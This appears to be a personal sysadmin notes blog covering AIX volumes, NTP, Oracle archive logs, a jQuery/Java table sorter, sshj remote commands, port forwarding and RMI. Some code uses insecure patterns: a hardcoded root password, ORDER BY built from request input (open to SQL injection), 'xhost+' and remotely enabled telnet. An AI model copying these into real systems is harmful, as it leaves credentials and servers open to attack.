INTRA-POLICY: center UPPER BOUND: 32
MOUNT POINT: /home LABEL: /home
MIRROR WRITE CONSISTENCY: on/ACTIVE
EACH LP COPY ON A SEPARATE PV ?: yes
Serialize IO ?: NO
dhdev01 / # df -g
Filesystem GB blocks Free %Used Iused %Iused Mounted on
/dev/hd4 0.38 0.23 40% 3349 2% /
/dev/hd2 11.00 2.45 78% 108362 4% /usr
/dev/hd9var 1.00 0.48 52% 816 1% /var
/dev/hd3 2.75 1.87 33% 10855 2% /tmp
/dev/hd1 1.00 0.46 55% 4222 2% /home
/proc - - - - - /proc
/dev/hd10opt 0.38 0.17 56% 3987 5% /opt
/dev/lv00 18.50 2.15 89% 97608 3% /u01
/dev/lv01 3.00 0.70 77% 36 1% /u02
/dev/lv02 3.00 2.91 4% 17 1% /oradisk
/dev/dh 4.00 2.56 36% 69153 7% /dh
/dev/db 31.75 18.40 43% 57 1% /dh/db
/dev/patch 4.75 0.26 95% 7607 1% /opt/patch
/dev/piers 4.38 0.92 80% 27870 3% /piers
/dev/piersdb 12.50 1.44 89% 55 1% /piers/db
/dev/uatbkup 19.75 19.03 4% 30 1% /piers/db/uatbkup
/dev/dailybkup 9.88 7.33 26% 2450 1% /piers/dailybkup
/dev/dbbkuplv 40.00 13.42 67% 91429 3% /dbbkup

PP SIZE * PPs(128 megabyte(s) * 8) == 1024M
表示逻辑卷hd1(Filesystem: /dev/hd1, Mounted on: /home)有1.00 GB blocks

查看逻辑卷在物理卷上的分布

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
dhdev01 / # lslv -l hd1
hd1:/home
PV COPIES IN BAND DISTRIBUTION
hdisk0 008:000:000 75% 000:000:006:002:000


dhdev01 / # lslv -m hd1
hd1:/home
LP PP1 PV1 PP2 PV2 PP3 PV3
0001 0225 hdisk0
0002 0241 hdisk0
0003 0242 hdisk0
0004 0309 hdisk0
0005 0310 hdisk0
0006 0311 hdisk0
0007 0336 hdisk0
0008 0413 hdisk0
dhdev01 / # lspv -p hdisk0|grep /home
225-225 used center hd1 jfs /home
241-242 used center hd1 jfs /home
309-311 used center hd1 jfs /home
336-336 used inner middle hd1 jfs /home
413-413 used inner middle hd1 jfs /home

说明:
DISTRIBUTION(000:000:006:002:000) 表示center有6个物理分区(对应第1-6的逻辑分区),inner middle有2个物理分区(对应7-8的逻辑分区)
COPIES(008:000:000) 表示第一个物理卷上有8个物理分区,没有第二和第三的拷贝分区
IN BAND(75%) 表示center[6] / center[6] + inner middle[2] = 0.75

增加某个文件系统的空间

  1. df -g | grep /home 查看/home所属的逻辑卷,假设是hd1
  2. lslv -l hd1 查看hd1所属的物理卷,假设是hdisk0
  3. lspv -p hdisk0 查看物理卷的可用空间
  4. smitty chfs 或者 chfs -a size=+10G /home
  5. 如果执行上述命令时出现问题:Maximum allocation for logical volume hd1,运行命令
    chlv -x 800 hd1 或 smitty chlv 或 smitty lv
    Please refer to how-to-expand-a-filesystem-in-aix-df-lsvg-chfs or practical-guide-to-aix-logical-volume-management
  6. extendlv与chfs是很接近的,但增加文件空间需要用chfs,不要用extendlv,因为extendlv会扩大逻辑分区,但不能反映的文件空间上的。

参考:

http://www.web-manual.net/aix/0516-787-extendlv-maximum-allocation-for-logical-volume-hd11admin-is-512/
http://wenku.baidu.com/view/f02cac4533687e21af45a960.html
http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/in-band-in-lslv-l-1110087
http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/increasing-the-filesystem-size-2639934
http://www.tek-tips.com/viewthread.cfm?qid=1150552
http://www.unix.com/aix/25249-increase-logical-partition.html

In-band解释

http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/in-band-in-lslv-l-1110087
http://pic.dhe.ibm.com/infocenter/powersys/v3r1m5/index.jsp?topic=/iphcg/lslv.htm
http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14532561

extendlv与chfs的区别

http://networktechnologist.com/tips-aix-lvm.html
http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.aix.cmds/doc/aixcmds2/extendlv.htm

NTP setting on AIX and Windows

AIX:

Server side(10.13.135.72)

  1. vi /etc/ntp.conf
    1
    2
    3
    4
    broadcastclient
    server 127.127.1.0 prefer
    driftfile /etc/ntp.drift
    tracefile /etc/ntp.trace
  2. startsrc -s xntpd
  3. lssrc -ls xntpd

Client side(10.13.135.71)

Method 1:

  1. vi /etc/ntp.conf
    1
    2
    3
    4
    broadcastclient
    server 10.13.135.71
    driftfile /etc/ntp.drift
    tracefile /etc/ntp.trace
  2. startsrc -s xntpd
  3. lssrc -ls xntpd

Method 2:

1
2
3
ntpdate 10.13.135.72
crontab -e
0 5,12 * * * ntpdate 10.13.135.72

Windows Client

1
2
3
4
5
w32tm /stripchart /computer:10.13.135.72 /samples:2 /dataonly
w32tm /config /syncfromflags:manual /manualpeerlist:10.13.135.72
w32tm /config /update
net stop w32time
net start w32time

Ref:

http://www-01.ibm.com/support/docview.wss?uid=isg3T1000653
http://www.aixchina.net/club/thread-1630-1-1.html
http://www.wretch.cc/blog/jerry0822/13996334
http://technet.microsoft.com/zh-cn/library/cc773263(v=ws.10).aspx

misc of command

Windows get uptime

  1. net stats srv|findstr
  2. systeminfo | find "System Boot Time:"
  3. eventvwr.msc -> filter EventID(6005)

Control a service

  1. net start tlntsvr

  2. sc \\hostname start tlntsvr

  3. Enable telnet service

    1
    2
    3
    4
    5
    6
    7
    $tlntsvr = gwmi -ComputerName webserver -Class Win32_Service -filter "name='tlntsvr'" -Credential $cred

    $tlntsvr.ChangeStartMode("Manual") (default it is Disabled)

    $tlntsvr.StartService()

    $ihs = gwmi -ComputerName webserver -Class Win32_Service -filter "name like 'IBM%1.3%'" -Credential $cred
  4. Enable remote desktop

    1
    2
    3
    4
    5
    6
    7
    $terminalService = gwmi -Class Win32_TerminalServiceSetting -Namespace root\cimv2\terminalservices -ComputerName webserver -Credential $cred //Windows Vista and Windows Server 2008

    $terminalService = gwmi -Class Win32_TerminalServiceSetting -Namespace root\cimv2 -ComputerName webserver -Credential $cred //Windows XP and Windows Server 2003

    $terminalService.AllowTsConnections // test the state

    $terminalService.SetAllowTSConnections(1)
  5. View eventlog by powershell

    1
    2
    3
    4
    5
    6
    7
    8
    9
    $username = "admin"
    $password = "password"
    $secstr = New-Object -TypeName System.Security.SecureString
    $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
    $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr

    $time = [System.Management.ManagementDateTImeConverter]::ToDmtfDateTime((Get-Date).AddHours(-72))

    gwmi Win32_NTLogEvent -filter "(LogFile='System') AND (Type='Error') AND (TimeWritten >= '$time')" -computer webserver -credential $cred | ft EventCode, EventType, Message -auto
  6. Open remote server path net use \\webserver\ipc$ password /user:username \\werbserver\c$

Reference

http://ss64.com/nt/sc.html
http://www.petri.co.il/check-uptime-in-server-2008.htm"

oracle archive log

to check setting about archive log

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sqlplus /nolog
conn /as sysdba

SQL>archive log list
SQL>show parameter archive

sql>select * from v$archive_processes;
sql>select log_mode from v$database;
sql>select archiver from v$instance

sql>select group#,members,sequence#,archived,status,first_change#,to_char(first_time, 'yyyy-mm-dd hh24:mi:ss') first_change_time from v$log;
sql>select name,sequence#,archived,status,first_change#, to_char(first_time, 'yyyy-mm-dd hh24:mi:ss') first_change_time from v$archived_log;

SQL>select * from V$BACKUP_REDOLOG;
SQL>select * from V$archive_dest;

to clean archive log

1
2
rman target / (rman target sys/sys@dbname more than one instance)
RMAN>list archivelog all;

method 1:
RMAN>delete archivelog until time 'sysdate-1';

method 2:

1
2
3
4
mv arch_1_1234.arc /tmp
RMAN>crosscheck archivelog all;
RMAN>list expired archivelog all;
RMAN>delete expired archivelog all;

Reference

http://www.cumt.org/blog/585
http://www.cnblogs.com/woody-wu/archive/2009/08/23/1552372.html

Block CONNECT method in httpd.conf

1
2
3
4
RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(CONNECT|TRACE)$
RewriteRule ^.*$ - [L,F]
ProxyRequests Off

ProxyRequest should be set to off, unless you have security protect in your web server.

IBM HTTP Server & Websphere Plugin

  • Understanding the WebSphere Application Server Web server plug-in

http://public.dhe.ibm.com/software/dw/wes/pdf/WASWebserverplug-in.pdf

  • Understanding IBM HTTP Server plug-in Load Balancing in a clustered environment

http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg21219567

  • Best Practice: WebSphere HTTP Plugin Failover for High Volume Web Sites

http://www.ibm.com/developerworks/websphere/library/bestpractices/plugin_failover_hvws.html

  • Understanding HTTP plug-in failover in a clustered environment

http://www-01.ibm.com/support/docview.wss?uid=swg21219808

  • How do the properties ServerIOTimeout and PostBufferSize affect plug-in behavior

http://www-01.ibm.com/support/docview.wss?uid=swg21408884
https://www.ibm.com/developerworks/mydeveloperworks/blogs/Dougclectica/entry/websphere_session_ids22?lang=en

jQuery Sorting Plugin

xxAction()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
pubilc void xxAction(){
String orderBy = request.getParameter("orderBy");
System.out.println("orderBy " + orderBy);

String sql = "select x.a, x.b from xx";

if (orderBy != null && orderBy.length() > 0) {
sql += " order by "
+ fieldSort.getSortBy()
+ (fieldSort.getAsc().equals(Boolean.TRUE) ? " asc"
: " desc");
} else {
orderBy = "xx";
sql += " order by " + orderBy;

request.setAttribute("sortBy", orderBy);
request.setAttribute("order", "up");
fieldSort.setAsc(Boolean.TRUE);
fieldSort.setSortBy(orderBy);
}
}

FieldSort.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import java.io.Serializable;

import javax.servlet.http.HttpServletRequest;

public class FieldSort implements Serializable {

private static final long serialVersionUID = 5877056172946099482L;
private String sortBy;
private Boolean asc;

private FieldSort() {

}

public String getSortBy() {
return sortBy;
}

public void setSortBy(String sortBy) {
this.sortBy = sortBy;
}

public Boolean getAsc() {
return asc;
}

public void setAsc(Boolean asc) {
this.asc = asc;
}

public static FieldSort createSorting(HttpServletRequest request,
String orderBy, String className) {
String orderKey = className + "lastFieldSort";
Object lastFieldSort = request.getSession().getAttribute(orderKey);
FieldSort fieldSort = null;

if (lastFieldSort == null) {
fieldSort = new FieldSort();
fieldSort.setSortBy(orderBy);
fieldSort.setAsc(Boolean.TRUE);
} else {
fieldSort = (FieldSort) lastFieldSort;

if (fieldSort.getSortBy() != null
&& fieldSort.getSortBy().equals(orderBy)) {
if (fieldSort.getAsc().equals(Boolean.TRUE)) {
fieldSort.setAsc(Boolean.FALSE);
} else {
fieldSort.setAsc(Boolean.TRUE);
}
} else {
fieldSort.setSortBy(orderBy);
fieldSort.setAsc(Boolean.TRUE);
}
}

request.setAttribute("sortBy", fieldSort.getSortBy());
request.getSession().setAttribute(orderKey, fieldSort);
if (fieldSort.getAsc().equals(Boolean.FALSE)) {
request.setAttribute("order", "down");
} else {
request.setAttribute("order", "up");
}

return fieldSort;
}
}

jquery.sortingTable.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
(function($) {
$.fn.sortingTable = function(options){
$("head").append("<style type='text/css'>.link { cursor: pointer})</style>");

var opts = $.extend({}, $.fn.sortingTable.defaults, options);

var tableId = this.attr('id');
var formName = opts.formName;

$("form[name='" + formName + "']").append('<input type="hidden" name="orderBy" value="">');

if( opts.sortColumns.length > 0 ){
$.each(opts.sortColumns, function(col){
$('#' + tableId + " thead th:eq(" + (col - 1) +")").addClass("link");
});
}else if(opts.excludeSortColumns.length == 0) {
this.find("thead th").addClass("link");
}

if( opts.excludeSortColumns.length > 0 ){
this.find('thead th').each(function(index, dom){
if($.inArray((index + 1), opts.excludeSortColumns) == -1){
$(this).addClass("link");
}
});
}


this.find("thead th").each(function(){
if( $(this).hasClass("link") ) {
$(this).click(function(){
var id = $(this).attr('id');
$(":hidden[name='orderBy']").val(id);

var form = $("form[name='" + formName + "']");
form.submit();
});
}
});

sorting(this, opts.sortBy, opts.order);

$.each(opts.mergeColumns, function(num){
_w_table_rowspan('#' + tableId, num);
});
};


var sorting = function(table, sortBy, order){
var position = 0;
var header = '';
table.find("thead th").each(function(index, dom){
if(sortBy == $(dom).attr('id')){
position = index;
header = $(dom).text();
}
});

table.find("thead th:eq(" + position + ")").html("<font color='yellow'>" + header + "</font>&nbsp;<img src='images/arrow_" + order + ".gif'/>");
}

var _w_table_rowspan = function(_w_table_id,_w_table_colnum){
_w_table_firsttd = "";
_w_table_currenttd = "";
_w_table_SpanNum = 0;
_w_table_Obj = $(_w_table_id + " tr td:nth-child(" + _w_table_colnum + ")");
_w_table_Obj.each(function(i){
if(i==0){
_w_table_firsttd = $(this);
_w_table_SpanNum = 1;
}else{
_w_table_currenttd = $(this);
if(_w_table_firsttd.text()==_w_table_currenttd.text()){
//var firstSection = _w_table_firsttd.parent().find('td:eq(4)').text();
//var currentSection = _w_table_currenttd.parent().find('td:eq(4)').text();

_w_table_SpanNum++;
_w_table_currenttd.hide(); //remove();
_w_table_firsttd.attr("rowSpan",_w_table_SpanNum);
}else{
_w_table_firsttd = $(this);
_w_table_SpanNum = 1;
}
}
});
}

$.fn.sortingTable.defaults = {
formName: 'form1',
sortBy: '',
order: 'asc',
sortColumns: [],
excludeSortColumns: [],
mergeColumns: []
};
})(jQuery)

xx.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<script type="text/javascript">
$(function(){
$("#result").sortingTable({
formName: 'form1',
sortBy: '${sortBy}',
order: '${order}',
excludeSortColumns: [1],
mergeColumns: [1, 2, 3, 10]
});
});
</script>
<table id="result" border="1">
<thead>
<tr>
<th id="xx.a">Chapter</th>
<th id="xx.b">Section/Regulation</th>
</tr>
</thead>
...
</table>

Call command through sshj

create a maven project mvn archetype:generate

copy sshj’s dependency to pom.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>dh</groupId>
<artifactId>ssh-remote</artifactId>
<version>1.0-SNAPSHOT</version>
<packaging>jar</packaging>

<name>ssh-remote</name>
<url>http://maven.apache.org</url>

<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>

<dependencies>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>3.8.1</version>
<scope>test</scope>
</dependency>

<dependency>
<groupId>net.schmizz</groupId>
<artifactId>sshj</artifactId>
<version>0.8.0</version>
</dependency>

<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-api</artifactId>
<version>1.6.1</version>
</dependency>
<dependency>
<groupId>ch.qos.logback</groupId>
<artifactId>logback-core</artifactId>
<version>0.9.29</version>
</dependency>
<dependency>
<groupId>ch.qos.logback</groupId>
<artifactId>logback-classic</artifactId>
<version>0.9.29</version>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>exec-maven-plugin</artifactId>
<version>1.1.1</version>
<executions>
<execution>
<phase>test</phase>
<goals>
<goal>java</goal>
</goals>
<configuration>
<mainClass>dh.App</mainClass>
<arguments>
<argument>arg0</argument>
<argument>arg1</argument>
</arguments>
</configuration>
</execution>
</executions>
</plugin>
</plugins>
</build>
</project>

create logback.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<configuration>

<appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
<!-- encoders are assigned the type
ch.qos.logback.classic.encoder.PatternLayoutEncoder by default -->
<encoder>
<pattern>%d{HH:mm} [%thread] %-5level %logger{36} - %msg%n</pattern>
</encoder>
</appender>

<!-- appender name="STDOUT"
class="ch.qos.logback.core.ConsoleAppender">
<layout class="ch.qos.logback.classic.PatternLayout">
<pattern>%-4relative [%thread] %-5level %class - %msg%n</pattern>
</layout>
</appender -->

<root level="off">
<appender-ref ref="STDOUT" />
</root>
</configuration>

coding App.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
package dh;

import java.io.IOException;
import java.util.concurrent.TimeUnit;

import net.schmizz.sshj.SSHClient;
import net.schmizz.sshj.common.IOUtils;
import net.schmizz.sshj.connection.channel.direct.Session;
import net.schmizz.sshj.connection.channel.direct.Session.Command;

public class App {
private static final String df_command = "df -g|head -3|tail -2";
private static final String recon_command = "/tmp/xx/pps-recon.sh";
private static final String user = "root";
private static final String passwd = "pass3822";
private static final String wap01fingerprint = "5a:34:f2:12:5f:2b:6c:8a:7d:8e:f0:1b:ca:1a:cb:f7";
private static final String wap02fingerprint = "2a:97:e4:7b:50:e2:8a:5c:38:ae:d4:bf:fa:8c:ee:01";

public void diskCheck() throws IOException {
run("10.13.135.71", wap01fingerprint, df_command);
run("10.13.135.72", wap02fingerprint, df_command);
}

private void restartRecon() throws IOException {
run("10.13.135.71", wap01fingerprint, recon_command);
run("10.13.135.72", wap02fingerprint, recon_command);
}

private void run(String host, String fingerprint, String command)
throws IOException {
final SSHClient ssh = new SSHClient();
//ssh.loadKnownHosts();

try {
ssh.addHostKeyVerifier(fingerprint);

ssh.connect(host);
ssh.authPassword(user, passwd);
final Session session = ssh.startSession();
try {
final Command cmd = session.exec(command);
System.out.println("<<" + host + ">> -- " + IOUtils.readFully(cmd.getInputStream())
.toString());
cmd.join(5, TimeUnit.SECONDS);
//System.out.println("\n** exit status: " + cmd.getExitStatus());
} finally {
session.close();
}
} finally {
ssh.disconnect();
}
}

public static void main(String... args) throws IOException {
App app = new App();
app.diskCheck();
app.restartRecon();
}
}

run: mvn compile package

file structure as below:

1
2
3
4
5
6
7
8
9
10
11
12
13
src
├─main
│ ├─java
│ │ └─dh
│ │ App.java
│ │
│ └─resources
│ logback.xml

└─test
└─java
└─dh
AppTest.java

run program in command line run.bat

1
2
3
4
@echo off
java -cp target/ssh-remote-1.0-SNAPSHOT.jar;C:/Users/HPUser/.m2/repository/ch/qos/logback/logback-core/0.9.29/logback-core-0.9.29.jar;C:/Users/HPUser/.m2/repository/ch/qos/logback/logback-classic/0.9.29/logback-classic-0.9.29.jar;C:/Users/HPUser/.m2/repository/net/schmizz/sshj/0.8.0/sshj-0.8.0.jar;C:/Users/HPUser/.m2/repository/org/slf4j/slf4j-api/1.6.1/slf4j-api-1.6.1.jar dh.App
rem mvn exec:java -Dexec.mainClass="dh.App"
rem mvn exec:java -Dexec.mainClass="dh.App" -Dexec.classpathScope=runtime

IP/Port forwarding

*nix

rinetd (http://www.boutell.com/rinetd/)

netcat ( http://netcat.sourceforge.net/)

1
2
mkfifo backpipe
nc -l 12345 0<backpipe | nc www.google.com 80 1>backpipe

socat (http://www.dest-unreach.org/socat/)

iptables (http://www.netfilter.org/downloads.html)

ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
ssh user@10.13.135.47 -L 7001:10.13.135.54:9081 -g
端口7001在当前运行这个命令的机器上打开
ssh user@10.13.135.47 -R 7001:10.13.135.54:9081 -g
端口7001在10.13.135.47机器上打开

A跟B是同一个网络,B跟C是一个网络,C跟D同一个网络,但A不能到达D。

B机上运行
ssh root@C_host -L 7001:D_host:9081 -g

B机上运行
netstat -an|grep 7001
会看到0.0.0.0的端口7001在监听(如果没有-g,会显示127.0.0.1:7001在监听)

这样A可以通过B的7001端口发送数据可以到达D的9081端口,其中B到C的数据链路是被加密了的,而A->B和C->D是没有的。

反向代理
如果A可以到B,但由于防火墙导致B不能到A,那么就可以使用ssh -R,让端口开在B。例如A是proxy,希望让B可以访问internet,可以使用如下方法:
A上运行:ssh -R 7001:localhost:8080 B
再在B上运行:export http_proxy=http://localhost:7001

题外话:
如果在C上配置nginx/squid了,这样可以使用C为proxy。
A->B(7001)->C(9081)->C(80/443)

java

mina (http://mina.apache.org)
netty (http://netty.io)
openportmapper (http://openportmapper.sf.net)

window

netcat (http://joncraton.org/blog/46/netcat-for-windows)
ncat (http://nmap.org)
3proxy (http://3proxy.ru/)

Ref:

http://en.wikipedia.org/wiki/Netcat
http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
http://fsfoundry.org/codefreak/2006/05/18/ssh-port-forwarding-basics/
https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/
http://blog.moonforest.org/2011/02/use-sshtunnel-and-nginx-as-proxy-on-android/
http://madeye.me/2011/02/10/ssh-tunnel-on-the-android-application-puff-android-edition

RMI学习

1
2
3
4
5
6
7
8
package rmi;

import java.rmi.Remote;
import java.rmi.RemoteException;

public interface MyService extends Remote {
void sayHi(String name) throws RemoteException;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
package rmi;

import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

public class MyServiceImpl extends UnicastRemoteObject implements MyService {

private static final long serialVersionUID = -8550790423811608199L;

protected MyServiceImpl() throws RemoteException {
super();
}

public void sayHi(String name) {
System.out.println("hello " + name);
}

}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
package rmi;

import java.net.MalformedURLException;
import java.rmi.Naming;
import java.rmi.RMISecurityManager;
import java.rmi.RemoteException;

public class RmiServer {
public static void main(String[] args) {
if (System.getSecurityManager() == null) {
System.setSecurityManager(new RMISecurityManager());
}

// String server = "0.0.0.0";
String server = "10.13.139.98";
String rmiPort = "2012";
System.out.println("starting server " + server);
try {
Naming.rebind("rmi://" + server + ":" + rmiPort + "/MyService",
new MyServiceImpl());
} catch (RemoteException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (MalformedURLException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
package rmi;

import java.net.MalformedURLException;
import java.rmi.Naming;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;

public class Client {
public static void morning() {
String server = "10.13.139.100";
String rmiPort = "2012";
try {
MyService myService = (MyService) Naming.lookup("rmi://" + server
+ ":" + rmiPort + "/MyService");
System.out.println("myService = " + myService);
myService.sayHi("Forest, Good morning!");
} catch (MalformedURLException e) {
e.printStackTrace();
} catch (RemoteException e) {
e.printStackTrace();
} catch (NotBoundException e) {
e.printStackTrace();
}
}

public static void main(String[] args) {
morning();
}
}

my.policy

codeBase "file:///C:/workspace/rmi/bin/*"{
1
2
  permission java.net.SocketPermission "0.0.0.0:2012", "connect,resolve";
};

Run commands,

1
2
3
4
5
6
7
C:\j2sdk1.4.2_10\bin\rmic.exe rmi.MyServiceImpl

rmiregistry.exe 2012

java.exe -Djava.rmi.server.hostname=10.13.139.98 -Djava.rmi.server.codebase=file:///C:/workspace/rmi/bin/ -Djava.security.policy=my.policy -cp . rmi.RmiServer

java.exe -cp . rmi.Client

注意:

  1. 如果机器上有多个IP,可以使用java.rmi.server.hostname指定其中一个,如果打印lookup后的对象,会看到MyServiceImpl_Stub[RemoteStub [ref: [endpoint:10.13.139.98:1085,objID:[f72617:1380931e011:-8000, 0]]]]
  2. java.rmi.server.codebase=file:///C:/workspace/rmi/bin/,windows下file后要有3个/,和最后要有个/
  3. my.policy中的*,代表该目录下的所有全限定类拥有权限,是classpath的路径,而不是在.class的目录

Reference

http://docs.oracle.com/javase/1.4.2/docs/guide/rmi/getstart.doc.html

AIX Lib path setting & AIX 5.x library url

Download wget from http://computer-refuge.org/classiccmp/aixpdslib/

Run command

1
2
3
4
5
uncompress wget.1.10.2.tar.Z
tar xvf wget.1.10.2.tar

crontab -l
20 13,19 * * 1-5 /usr/local/bin/wget -q --no-cache -O /dev/null http://aa.bb.com

then set library path as below,

1
2
export LD_LIBRARY_PATH=/tmp/xx/tools/usr/local/lib
export LIBPATH=$LD_LIBRARY_PATH

Reference
http://computer-refuge.org/classiccmp/aixpdslib/
http://www.perzl.org/aix/index.php?n=Main.HomePage
http://gnome.bullfreeware.com/aixtoolbox/RPMS/ppc/
http://www.bullfreeware.com/
http://bio.gsi.de/DOCS/AIX/aixpdslib.seas.ucla.edu/

Crystal Clear出现X connection to :0.0 broken (exp...

Crystal Clear遇到个问题,在AIX的native_stderr.log看到X connection to :0.0 broken (explicit kill or server shutdown).
运行xhost,hold住了,没有反应。

折腾了一天,解决方法很简单,将DISPLAY由:0.0改为:100.0,虽然有些古怪,but it works.

这个问题让自己了解到更多X Server的内容。

要启动AIX上的X Server

/usr/dt/bin/dtlogin -daemon

然后产生如下进程:

1
2
/usr/lpp/X11/bin/X -x abx -x dbe -x GLX -D /usr/lib/X11//rgb -T -force :0 -auth /var/dt/A:0-vcgtMa
/usr/bin/X11/X -force -vfb -x abx -x dbe -x GLX :100

如果DISPLAY=:100.0 用 netstat -an|grep 100 会看到6100端口开启了,等待连接。

以下是一些摘录的内容:

The X server can be disabled and then killed with the following

commands:

1
2
/usr/dt/bin/dtconfig -d
/usr/dt/bin/dtconfig -kill

The X server can be restored after applying the fix with the following commands:

1
2
/usr/dt/bin/dtconfig -e
/usr/bin/startsrc -s dtsrc

Others

  1. Open a terminal emulator window, and log in as root.
  2. Obtain the process ID of the Login Manager by typing the following:
    cat /var/dt/Xpid
  3. Stop the Login Manager by typing:
    kill -term process_id

Starting the Common Desktop Environment manually. Use this procedure to start the Common Desktop Environment manually.

  1. Log in to your system as root.
  2. At the command line, type the following:
    /usr/dt/bin/dtlogin -daemon
    tail /var/dt/Xerrors

参考:

https://groups.google.com/group/comp.unix.aix/browse_thread/thread/9ccd826368903176?pli=1
http://blog.csdn.net/huang_tg/article/details/6120409

Samba & add route in AIX

Samba

1
2
3
smbclient -L 10.13.135.99 -U ITDEV%ITDEV -D /itshare
smbclient //10.13.135.99/itshare -U ITDEV%ITDEV
smbclient //10.13.135.99/itshare -U ITDEV%ITDEV -c "ls"

Two network cards in server, so add route to let my local machine can be accessible in server

1
2
3
4
5
6
7
8
9
ifconfig -a
en0:10.13.135.31
en1:10.13.135.81

route add 10.13.136.237 10.13.135.65 -if en1
route delete 10.13.136.237 10.13.135.65
ping 10.13.136.237
traceroute -r -s 10.13.135.81 10.13.136.237
netstat -r traceroute 10.13.136.237

删除不用的默认gateway
route delete default 10.13.135.1

Crystal Clear出现Could not initialize class sun.awt.X11GraphicsEnvironment

系统使用Websphere 5,相应的jdk是1.3,所以无法使用headless模式-Djava.awt.headless=true解决这个问题。

在jdk1.3下的有几个比较重要的步骤:

  1. 出现java.lang.NoClassDefFoundError: sun/awt/X11GraphicsEnvironment

用export DISPLAY=:100

1
2
3
<machine name>:<server number>.<screen number>
<machine name>默认是localhost
<screen number>>默认是0
  1. 如果上述步骤后出现Can’t connect to X11 window server using ‘:100’ as the value of the DISPLAY variable.
    用xhost+local machine name
    当然最简单是xhost+,这样可以让所有机器访问这台服务器

  2. 之前遇到的问题使用上述两个步骤就可以解决了,但有个前提是已经安装了Xvfb(Virtual X11 Frame Buffer),使用命令
    ps -ef|grep X

AIX显示结果如下:

1
2
root   3420   5236   0   Jan 03      -  5:02 /usr/lpp/X11/bin/X -x abx -x dbe -x GLX -D /usr/lib/X11//rgb -T -force :0 -auth /var/dt/A:0-SVfhqa
root 25812 1 120 Jan 03 - 32714:55 /usr/bin/X11/X -force -vfb -x abx -x dbe -x GLX :100

参考:

http://www.websina.com/bugzero/faq/exception-x11.html
http://download.oracle.com/otn_hosted_doc/jdeveloper/904preview/uixhelp/uixdevguide/xserver.html

在AIX上安装ssh

由于没有办法在AIX 5.2上使用smitty install_all openssh,因为安装完后调用ssh命令出现error,只有在一台当年已经安装了ssh的机器上copy过来,另外由于不想再/usr/local上安装这个ssh,在/tmp上安装这个ssh了。

  1. 使用nfs搭桥到装有ssh的机器。

  2. Copy files

    1
    2
    3
    copy -rp /usr/local/sbin/sshd /tmp/xx/ssh/sbin
    copy -rp /usr/local/bin /tmp/xx/ssh/
    copy -rp /usr/local/etc /tmp/xx/ssh/
  3. 创建子系统

    1
    2
    mkssys -s sshd -p /tmp/xx/ssh/sbin/sshd -a "-D -f /tmp/xx/ssh/etc/sshd_config" -u 0 -e /dev/console -i /dev/console -o /dev/console -R -Q -S -f 9 -n 15 -E 20 -G ssh -d -w 20
    lssrc -S -s sshd (check it exists)

    如果有什么改动,可以
    chssys -s sshd -a "-D -f /tmp/xx/ssh/etc/sshd_config"

  4. 由于系统没有sshd用户,所以启动时候有些错误,可以增加sshd用户,或者在sshd_config中将
    UsePrivilegeSeparation no

  5. 和修改key的路径

    1
    2
    3
    HostKey /tmp/xx/ssh/etc/ssh_host_rsa_key
